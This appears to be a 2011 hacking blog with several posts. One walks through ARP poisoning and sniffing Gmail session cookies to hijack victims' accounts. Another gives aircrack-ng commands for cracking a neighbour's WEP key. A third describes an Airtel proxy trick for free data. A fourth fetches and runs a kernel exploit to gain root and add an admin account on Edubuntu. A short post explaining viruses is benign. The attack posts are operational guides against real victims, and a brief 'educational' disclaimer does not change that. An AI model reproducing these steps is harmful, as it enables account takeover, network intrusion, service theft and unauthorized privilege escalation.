Friday, April 22, 2011

Hacking Gmail account using GX cookie

Introduction



Hacking web application was always curious for the script kiddies. And hacking free web email account is every geek first attempt. The method which I will describe in this post is not new; the same method can be applied to yahoo and other free web email services too.

The method we will be using is cookie stealing and replaying the same back to the Gmail server. There are many ways you can steal cookie, one of them is XSS (Cross site scripting) discussed by other is earlier post. But we won’t be using any XSS here, in our part of attack we will use some local tool to steal cookie and use that cookie to get an access to Gmail account.

Assumption:
  • You are in Local Area Network (LAN) in a switched / wireless environment : example : office , cyber café, Mall etc.
  • You know basic networking.

Tool used for this attack:
  • Cain & Abel
  • Network Miner
  • Firefox web browser with Cookie Editor add-ons

Attack in detail:

We assume you are connected to LAN/Wireless network. Our main goal is to capture Gmail GX cookie from the network. We can only capture cookie when someone is actually using his gmail. I’ve noticed normally in lunch time in office, or during shift start people normally check their emails. If you are in cyber café or in Mall then there are more chances of catching people using Gmail.

We will go step by step,
If you are using Wireless network then you can skip this Step A.

A] Using Cain to do ARP poisoning and routing:



Switch allows unicast traffic mainly to pass through its ports. When X and Y are communicating eachother in switch network then Z will not come to know what X & Y are communicating, so inorder to sniff that communication you would have to poison ARP table of switch for X & Y. In Wireless you don’t have to do poisoning because Wireless Access points act like HUB which forwards any communication to all its ports (recipients).
  • Start Cain from Start > Program > Cain > Cain
  • Click on Start/Stop Snigger tool icon from the tool bar, we will first scan the network to see what all IPs are used in the network and this list will also help us to launch an attack on the victim.
  • Then click on Sniffer Tab then Host Tab below. Right click within that spreadsheet and click on Scan Mac Addresses, from the Target section select
All hosts in my subnet and then press Ok. This will list all host connected in your network. You will notice you won’t see your Physical IP of your machine in that list.
How to check your physical IP ?
> Click on start > Run type cmd and press enter, in the command prompt type
Ipconfig and enter. This should show your IP address assign to your PC.
It will have following outputs:


Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : xyz.com
IP Address. . . . . . . . . . . . : 192.168.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
Main thing to know here is your IP address and your Default Gateway.

Make a note of your IP Address & default gateway. From Cain you will see list of IP addresses, here you have to choose any free IP address which is not used anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.

  • Click on Configure > APR > Use Spoof ed IP and MAC Address > IP
Type in 192.168.1.10 and from the poisoning section click on “Use ARP request Packets” and click on OK.

  • Within the Sniffer Tab , below click on APR Tab, from the left hand side click on APR and now click on the right hand top spreadsheet then click on plus sign tool from top. The moment you click that it will show you list of IP address on left hand side. Here we will target the victim IP address and the default gateway.

The purpose is to do ARP poisoning between victim and the default gateway and route the victim traffic via your machine. From the left side click on Victim IP address, we assume victim is using 192.168.1.15. The moment you click on victim IP you will see remaining list on the right hand side here you have to select default gateway IP address i.e. 192.168.1.1 then click on OK.
  • Finally, Click on Start/Stop Sniffer tool menu once again and next click on Start/Stop APR. This will start poisoning victim and default gateway.

B] Using Network Miner to capture cookie in plain text



We are using Network miner to capture cookie, but Network miner can be used for manythings from capturing text , image, HTTP parameters, files. Network Miner is normally used in Passive reconnaissance to collect IP, domain and OS finger print of the connected device to your machine. If you don’t have Network miner you can use any other sniffer available like Wireshark, Iris network scanner, NetWitness etc.

We are using This tool because of its ease to use.

  • Open Network Miner by clicking its exe (pls note it requires .Net framework to work).
  • From the “---Select network adaptor in the list---“ click on down arrow and select your adaptor If you are using Ethernet wired network then your adaptor would have Ethernet name and IP address of your machine and if you are using wireless then adaptor name would contain wireless and your IP address. Select the one which you are using and click on start.
Important thing before you start this make sure you are not browsing any websites, or using any Instant Mesaging and you have cleared all cookies from firefox.
  • Click on Credential Tab above. This tab will capture all HTTP cookies , pay a close look on “Host” column you should see somewhere mail.google.com. If you could locate mail.google.com entry then in the same entry right click at Username column and click on “copy username” then open notepad and paste the copied content there.
  • Remove word wrap from notepad and search for GX in the line. Cookie which you have captured will contain many cookies from gmail each would be separated by semicolon ( GX cookie will start with GX= and will end with semicolon you would have to copy everything between = and semicolon
Example : GX= axcvb1mzdwkfefv ; ßcopy only axcvb1mzdwkfefv

Now we have captured GX cookie its time now to use this cookie and replay the attack and log in to victim email id, for this we will use firefox and cookie editor add-ons.

C] Using Firefox & cookie Editor to replay attack.



  • Open Firefox and log in your gmail email account.
  • from firefox click on Tools > cookie Editor.
  • In the filter box type .google.com and Press Filter and from below list search for cookiename GX. If you locate GX then double click on that GX cookie and then from content box delete everything and paste your captured GX cookie from stepB.4 and click on save and then close.
  • From the Address bar of Firefox type mail.google.com and press enter, this should replay victim GX cookie to Gmail server and you would get logged in to victim Gmail email account.
  • Sorry! You can’t change password with cookie attack.

How to be saved from this kind of attack?
Google has provided a way out for this attack where you can use secure cookie instead of unsecure cookie. You can enable secure cookie option to always use https from Gmail settings.
Settings > Browser connection > Always use https

(FOR EDUCATIONAL PURPOSE ONLY)

Sunday, April 17, 2011

What is Virus?

What is a Virus?

Have you ever ask your self that question befor? well here i am going to show you the basic of what a virus really is. A virus is a piece of code so will try to do wierd actions on your computer. Copy itselfs to diffrent places on the computer is the most commont action it will do. They may attach it self to a spesifc program or spesifc file type. The importent part to a virus is to survive as long as Possible. The writters to the virus want it to stay alive. What a virus will do is try to gain access to the system of the computer to take control over important Functions of the system. This is how a virus will try to stay alive. Some viruses may also try to attack Threats as AV's disable important functions like "Task Manager" so you can't turn off the Processes the virus is running in.

What i mean about important Functions is like "System Restore" ect this can restore the computer to a later condition. So to mabye delete all the restore points or even disable it from the user to use it. Viruses are much more harder to get ride of if they are Executed on the victems computer since than they can use hiding Techniques to try avoid to get detected by the AV's. They will most likely try to not exist on the computer. Since they are trying to merge with virus free programs so are legaly. Also they can try to Deny access to files they are hiding in so the AV's can't open them up. This is just few Techniques they will try to use to stay hidden on the victems computer. So you should always scan files befor you execute them.

So how can they really take away important Functions on the computer like "Task Manager"? Every function to the computer is saved in something called registry. So viruses will normaly do alot of changs there to take out functions so are important to the computer and user. Normal computer users without knowledge about registry are'nt able to turn thos needed Functions like Task Manager on again. There is alot of persons out there in the World so don't even know about how this really works. Think about every Person on the Earth nearly all have a computer so they have access to at home? But have they really any knownledge about the threats and how to deal with them? Answers is No!. So this is why its so very big risk for so many to get infected since they are'nt really prepared about the threats out there so are hiding in every single corner when you surf on the internet. They are'nt taking the Alert on how bad it really is. When they are download something they are't even beliving that it might be a threat? Are they even scan the Files befor they execute them? I think No! All thos problems would'nt be so big if peoeple really open up there eyes and took a look at whats going an.

What ever all the AV's and Security stuff poeple are making. It wont stop the threats as viruses and unwated programs will still be everywhere but if poeple just stopped up for one second and started to be abit more carefully about what they are doing on the Internet they might not be as so big risks as they are today. Just with simple few steps they can avoid to get infected.

HOW CAN I GET INFECTED?

- Downloading Software
- Clicking on Pop up windows
- Clicking on Attachments via E-Mail
- Have't patched up the computer
- Surfing on Unsecure Sites
- Entering unsecure IRC rooms
- Clicking on Links so you may get from "Messenger" or "E-Mail"

Here you see a few ways you can get infected with viruses. So as you see its very easy get it. But if you just thinking about what you are doing on the computer you can easy avoid alot of virus infections. Many Poeple may ask what is the best protection? There are't any program so can give you 100% secure computer. Best AV's you have on your computer is "You".

Tuesday, April 12, 2011

WEP Cracking with Backtrack

WEP Cracking with Backtrack

First, you will need to have Backtrack 4 (LINK)
*** I find it that if you are smart enough to be into hacking you will atleast know how to burn an image file to a DVD, so after you do that, boot up the DVD in the and run BT4.

Login: root
Password: toor


Once logged in, type in: startx
BT4 is now set up, heres the following.
==

WEP CRACK GUIDE


1. Open konsole and type the following to start up network connections.

/etc/init.d/networking start


2. Now we are going to put the network card into monter mode by typing the following.

airmon-ng

(You will find your Interface here)

3. So first start up the scan

airmon-ng start wlan0 or 1

(depends on what it reads your card as, replace as needed)

4.Lets spoof your MAC address first by typing this next command.

ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up


This will make it so we change our MAC address to the computer we are connecting to

5.Time to start finding our victims router, type in konsole.

airodump-ng mon0

This will show the list and once you find one that suits your interest, Continue.

6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole

airodump-ng -c channel number, --bssid the BSSID of the router, -w what you want to save the cap file as, then mon0 (the interface we are using)

example: airodump-ng -c 1 - - bssid 11:22:33:44:55:66 -w wepcap mon0


7. Lets start the passkey cracking. We need to get around 20,000-50,000 IVs. We start by sending fake authentication requests. To do this open a new konsole and type:

aireplay-ng -1 1 -a The BSSID of the router, then the interface.
example: aireplay-ng -1 1 a 11:22:33:44:55:66 mon0


8. Almost done, we just need to contune the ARP cycle, open another konsole and type:

aireplay-ng -3 -b The BSSID of the router, then the interface, and it will start replaying ARPs.


Collect a good ammount of IVs like around 20k to 50k. Once its their, type CTRL - C to stop the process and continue to 9.

9. Time to start cracking that cap file :D Open a new konsole and type.

aircrack-ng -b (bssid) (file name)-01.cap
example: aircrack-ng 11:22:33:44:55:66 wepcap-01.cap


10. Now we should have the key to log in to the router, have fun enjoying your hacked wifi

Sunday, April 10, 2011

Airtel GPRS trick

Connecting Device : Your mobile’s modem
ISP Name : anyname (anything you like)
Phone Number : *99***3# / Try 99***1
Username and Password : blank
5) Configure your browser and download manager to use the proxy
100.1.200.99 and port 8080.( My advice is to use Opera since you
can browse both wap and regular websites)
6) Connect to the dial-up account. You will be connected at 115.2
kbps (but remember, that is a bad joke).
7) Pick up your mobile and try to access any site. You will get “Access
Denied…”(except for Airtel Live!). IT DOES NOT MATTER.
Keep the mobile down.
8 ) On the PC ( or Laptop) open your browser, enter any address ,
press ENTER and…….WAIT
9) After a few seconds the page will start to load and you have the
Whole Internet at your Disposal.

SECOND METHOD:
First Go to settings menu then to connectivity tab now choose the option Data comm. then "DATA ACCOUNTS" go to new account now the settings r as follows
ACCOUNT TYPE:GPRS
NEW ACCOUNT NAME:A1
APN:airtelfun.com
User name: (blank)
Password: (blank)
Now save it
NOW!
Go to Internet Setting in connectivity here choose intrnet profile--go to new profile setting are As below
NAME:A1
CONNECT USING:A1(which was created in data comm.)
Save It
Now you would be able to see it now selest it and take "more" option then select setting here in use proxy option it will be selected no if it is no then change it into yes
Now Go to Proxy address and give the adress as
100.1.200.99 and then the port number as 8080
User name:
Password:
 
Now save all the settings You made . Come back 2 connectivity
choose streaming settings now in connect using option choose a1 that we created leave the use Proxy option as no itself
TheseAre The Settings
now access airtellive! from ur activated SE phone goto VIDEO GALLERY OR VIDEO UNLIMITED(varies according to states) choose live streaming then choose CNBC OR AAJTAK WHILE CONNECTING TO MEDIA SERVER cancel AFTER 9 or 10 sec then type any web adress if it shows access denied then once again select CNBC and wait for a few more sec than before if its fully connected also no prob its free then cancel it or if ur connected then stop it and the internet is ready to take of .
GOOD LUCK SE AIRTEL USERS

Sunday, April 3, 2011

How to make yourself admin on Linux Edubuntu




Step1: Log in with a user, for an example with student
Step2: Start the terminal, by clicking Applications -> Accessories -> Terminal. It'll open a new terminal window
Step3: Type cd /var/tmp and then wget http://exploit-db.com/sploits/2009-linux...ge3.tar.gz. Wait for the download to finish.
Step4: After it reaches 100%, type tar -zxvf 2009-linux-sendpage3.tar.gz
Step5: After the files are unpacked, navigate to that directory by writing cd linux-sendpage3 in the terminal
Step6: Change the permissions, chmod +x *
Step7: Type ./run wait for it to execute, and then type bash
Step8: You are now root in the terminal, but now we want to make our own account, so we log in with our account as it will have full administration permissions, by typing adduser username in the terminal where username is the username you wish to choose.
Step9: Now write gksu users-admin on the terminal, and a new window will pop up. Select your new user and click the Parameters button and navigate to the Permissions tab tick/select all of the boxes
Step10: Now you are ready to log in with your new administrator account :)